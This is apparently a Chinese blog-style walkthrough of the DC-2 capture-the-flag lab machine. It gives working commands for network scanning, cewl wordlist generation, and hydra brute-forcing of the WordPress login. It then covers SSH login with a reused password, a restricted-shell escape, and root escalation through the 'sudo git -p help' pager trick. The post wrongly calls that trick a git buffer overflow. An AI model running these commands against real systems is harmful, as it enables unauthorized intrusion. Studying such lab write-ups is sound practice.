环境:
kali:192.168.75.129 DC2 -靶机 和 kali 在同一C段
先是arp-scan -l检索局域网内主机
发现靶机地址,使用nmap进行扫描 nmap -A -p 1-65535 192.168.75.136
发现打开了80端口,SSH端口
那么直接访问80看看有没有什么神奇的东西
还跳转了,上hosts重定向。
win10路径: C:WindowsSystem32driversetc
linux路径:/etc/hosts
访问成功,发现flag1
使用工具 cewl爬取生成密码
cewl http://dc-2/ -w passwd.txt
准备使用wpscan进行搞事情,但我。。
上hydra大杀器吧,修是不可能修的,,,WordPress默认后台地址:/wp-admin 且WordPress当用户名不存在时会提示用户不存在,可增加爆破效率
hydra -L user.txt -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
我们跑出了 jerry和tom账户,登进去看看
tom,没啥东西,jerry用户界面如下,发现了flag2
啊哈
想到上一个DC1的靶机是用SSH干进去的
问题是,WordPress的CMS本身还是比较安全的,问题基本都出在插件上,可这个jerry的账号权限不够,无法安装插件来上传shell
那就硬着头皮ssh试试看,用登录账号密码试试
jerry老贼不是同一个密码,太草(一种植物)蛋了
试试看Tom老贼
不愧是你。。。。
执行命令发现 command not found,百度得知这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加
BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
得到flag3
切换到Jerry,发现flag4.txt
哈?Git还能提权?
试试看吧。看看git有没有那个权限 sudo -l
flag不会骗人(小声bb)
sudo git -p help
!/bin/sh
奇怪,我怎么没法提权,查了查百度,发现
git有一个缓冲区溢出漏洞,在使用sudo git -p –help时,不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数,使其一次性显示不完这条命令的回显结果,这样这条命令就一直处于运行状态,加上此时处于root权限,我们直接在这时候打开bash shell,直接提权至root。
看起来要打开gui了,来自Xshell的鄙,艹(一种植物)
奇怪的知识增加了
